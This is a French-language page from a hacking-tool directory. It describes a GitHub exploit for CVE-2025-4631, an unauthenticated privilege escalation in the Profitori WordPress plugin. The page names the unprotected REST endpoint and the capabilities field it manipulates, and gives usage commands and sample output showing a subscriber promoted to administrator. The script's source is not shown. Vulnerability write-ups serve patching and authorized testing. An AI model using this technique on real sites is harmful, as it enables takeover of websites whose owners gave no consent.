Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-4631 — Profitori 2.0.6.0 - 2.1.1.3 - Absence d'autorisation menant à une escalade de privilèges non authentifiée | Kitploit
Outils/GitHubGitHub/nxploited/cve-2025-4631
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCTFTests d'IntrusionApprentissage et Éducation
GitHubnxploited/cve-2025-4631

CVE-2025-4631

Profitori 2.0.6.0 - 2.1.1.3 - Absence d'autorisation menant à une escalade de privilèges non authentifiée

Voir le dépôt
111il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🚨 CVE-2025-4631 - Exploit d'élévation de privilèges du plugin WordPress Profitori

📌 Résumé de la vulnérabilité

Le plugin Profitori (versions 2.0.6.0 à 2.1.1.3) est vulnérable à une élévation de privilèges non authentifiée en raison d'un contrôle de capacité manquant dans le point de terminaison /wp-json/stocktend/v1/stocktend_object. Cela permet à des attaquants distants d'élever les privilèges d'utilisateurs existants (ou d'en créer de nouveaux) en manipulant directement le champ méta wp_capabilities.

  • CVE : CVE-2025-4631
  • Score CVSS : 9.8 (Critique)
  • Publié : 30 mai 2025
  • Dernière mise à jour : 31 mai 2025

🛠️ Ce que fait ce script

Cet exploit Python automatise le processus d'élévation de privilèges en :

  1. ✅ Vérifiant la version du plugin via le fichier readme.txt.
  2. 🚀 Exploitant le point de terminaison REST API vulnérable si une version vulnérable est détectée.
  3. 📡 Envoyant la charge utile pour élever les privilèges d'un utilisateur au rang d'Administrateur.
  4. 🧾 Affichant des résultats détaillés et formatés, y compris les identifiants modifiés de l'utilisateur.

Si la vérification de version échoue, l'exploit se poursuit prudemment avec un avertissement.


📸 Preuve de l'exploit

Proof of Concept


💻 Utilisation

root@kitploit:~
usage: CVE-2025-4631.py [-h] -u URL -id ID [--email EMAIL] [--name NAME] [--url_field URL_FIELD] [--verbose]

Exemple :

root@kitploit:~
python CVE-2025-4631.py -u http://nxploit.ddev.site -id 3

Exemple de sortie :

root@kitploit:~
[📄] Vérification de la version du plugin sur : http://nxploit.ddev.site/wp-content/plugins/profitori/readme.txt
[✅] Version vulnérable détectée : 2.1.1.3
[🚀] Exploitation dans 3 secondes...
[📡] Envoi de la requête d'élévation de privilèges vers : http://nxploit.ddev.site/wp-json/stocktend/v1/stocktend_object
[🎯] Exploit terminé avec succès !

[🧾] Informations utilisateur mises à jour :
--------------------------------------
🆔 ID utilisateur         : 3
👤 Nom d'utilisateur     : subscriber
📧 Email                  : [email protected]
🪪 Nom d'affichage       : Subscriber User
🔗 URL utilisateur       : 
🛡 Rôle brut             : a:1:{s:13:"administrator";b:1;}

[👑] Exploit par : Nxploited (Khaled_alenazi)
🔗 GitHub        : https://github.com/Nxploited
📧 Email         : [email protected]

⚙️ Arguments du script


📂 Prérequis

  • Python 3.x
  • Bibliothèque requests

Installation via :

root@kitploit:~
pip install requests

⚠️ Avertissement

Cet outil est fourni à des fins éducatives et de tests autorisés uniquement. Toute utilisation abusive de cet exploit contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite est strictement interdite. Le créateur décline toute responsabilité en cas de dommages ou de conséquences juridiques découlant d'une utilisation inappropriée.


Par : Nxploited ( Khaled_Alenazi )

Télécharger l’outil
FlagDescriptionRequis
-u, --url🌐 URL de base du site WordPress✅ Oui
-id🆔 ID de l'utilisateur à élever✅ Oui
--email📧 Email fictif à afficher❌ Non
--name👤 Nom d'affichage❌ Non
--url_field🔗 Champ URL utilisateur❌ Non
--verbose🔍 Afficher la réponse JSON complète❌ Non